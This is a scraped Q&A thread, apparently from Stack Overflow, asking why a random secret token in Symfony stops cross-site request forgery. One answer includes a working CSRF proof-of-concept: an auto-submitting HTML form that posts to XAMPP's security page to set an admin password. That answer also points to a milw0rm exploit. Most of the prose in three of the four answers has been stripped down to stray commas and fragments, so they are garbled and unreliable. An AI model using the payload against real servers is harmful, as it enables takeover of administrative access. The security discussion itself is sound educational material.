Why can a CSRF attack be prevented by a random CSRF secret?

Question

Why can a CSRF attack be prevented by a random CSRF secret?

To prevent CSRF attacks, a random CSRF secret was created.

Above from symfony: http://www.symfony-project.org/getting-started/1_4/en/04-Project-Setup

Since it is finally managed by users, which are the so-called deputy attack. How does it work by setting this secret?

+3

security csrf

user261527 Jan 29 '10 at 4:05

source share

4 answers

Jay Zeng · Answer 1 · 2010-01-29T05:08:47+0000

OWASP (open source web application security project) has a very good explanation on CSRF, I recommend that you read it and then send your questions.

http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

, CSRF, Django . http://docs.djangoproject.com/en/dev/ref/contrib/csrf/

rook · Answer 2 · 2010-01-29T07:14:18+0000

CSRF XSRF Cross-Site Request Forgery. , "" HTTP-, html javascript, . CSRF, XAMPP. , html/js POST, "" . CSRF XAMPP, .

<html>
    <form action='http://127.0.0.1/security/xamppsecurity.php' method='POST' id=1>
        <input type="hidden" name="_SERVER[REMOTE_ADDR]" value="127.0.0.1">
        <input type=hidden name="xamppuser" value=admin >
        <input type=hidden name="xampppasswd" value=password>
        <input type=hidden name="xamppaccess" value="Make+safe+the+XAMPP+directory">
        <input type=submit>
    </form>
</html>
<script>
    document.getElementById(1).submit();
</script>

, . sesion basic-auth, . , , . , . CAN , XSS. , , CSRF XSS: http://www.milw0rm.com/exploits/7922

atk · Answer 3 · 2010-01-29T04:55:10+0000

CSRF FAQ cgisecurity (http://www.cgisecurity.com/csrf-faq.html). , FAQ, .

EDIT: CSRF FAQ, , , :

< > , ?

CSRF . , , . , . , , , XSS .

maskie · Answer 4 · 2010-09-22T10:39:48+0000

Symfony's CSRF secret is well explained here: http://www.nacho-martin.com/csrf-tokens-in-symfony

Why can a CSRF attack be prevented by a random CSRF secret?

More articles: